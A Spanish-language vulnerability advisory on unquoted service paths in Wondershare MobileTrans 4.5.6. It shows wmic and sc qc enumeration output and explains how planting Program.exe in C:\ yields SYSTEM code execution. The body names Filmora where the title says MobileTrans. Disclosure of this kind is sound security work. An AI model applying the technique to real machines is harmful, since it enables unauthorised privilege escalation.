
Wondershare MobileTrans 4.5.6 - Ruta de servicio sin comillas
Wondershare MobileTrans 4.5.6 - Ruta de servicio sin comillas
Wondershare Filmora versiones 4.5.6 y anteriores contienen múltiples rutas de servicio sin comillas que permiten a los atacantes escalar privilegios al nivel del sistema.
Ruta del binario del servicio WsAppService3: C:\Program Files (x86)\Wondershare\WAF3\3.0.0.308\WsAppService3.exe Ruta del binario del servicio ElevationService: C:\Program Files (x86)\Wondershare\MobileTrans\ElevationService.exe
C:\Windows\system32>cmd /c wmic service get name,displayname,pathname,startmode |findstr /i "auto" |findstr /i /v "c:\windows\\" |findstr /i /v """
Wondershare Driver Install Service help ElevationService C:\Program Files (x86)\Wondershare\MobileTrans\ElevationService.exe Auto
Wondershare Application Update Service 3.0 WsAppService3 C:\Program Files (x86)\Wondershare\WAF3\3.0.0.308\WsAppService3.exe Auto
C:\Windows\system32>sc qc WsAppService3
[SC] QueryServiceConfig SUCCESS
SERVICE_NAME: WsAppService3
TYPE : 10 WIN32_OWN_PROCESS
START_TYPE : 2 AUTO_START
ERROR_CONTROL : 1 NORMAL
BINARY_PATH_NAME : C:\Program Files (x86)\Wondershare\WAF3\3.0.0.308\WsAppService3.exe
LOAD_ORDER_GROUP :
TAG : 0
DISPLAY_NAME : Wondershare Application Update Service 3.0
DEPENDENCIES : RPCSS
SERVICE_START_NAME : LocalSystem
C:\Windows\system32>sc qc ElevationService
[SC] QueryServiceConfig SUCCESS
SERVICE_NAME: ElevationService
TYPE : 10 WIN32_OWN_PROCESS
START_TYPE : 2 AUTO_START
ERROR_CONTROL : 1 NORMAL
BINARY_PATH_NAME : C:\Program Files (x86)\Wondershare\MobileTrans\ElevationService.exe
LOAD_ORDER_GROUP :
TAG : 0
DISPLAY_NAME : Wondershare Driver Install Service help
DEPENDENCIES :
SERVICE_START_NAME : LocalSystem
Si un usuario malintencionado tiene permisos de escritura en cualquiera de las rutas con espacios, puede colocar un ejecutable malicioso en esa carpeta y ejecutar código como SYSTEM. Por ejemplo, consideremos un usuario con pocos privilegios que tiene permisos de escritura en C:, entonces podemos colocar un ejecutable malicioso llamado Program.exe en la ruta C:\ y al reiniciar, el servicio ejecutará el payload como SYSTEM.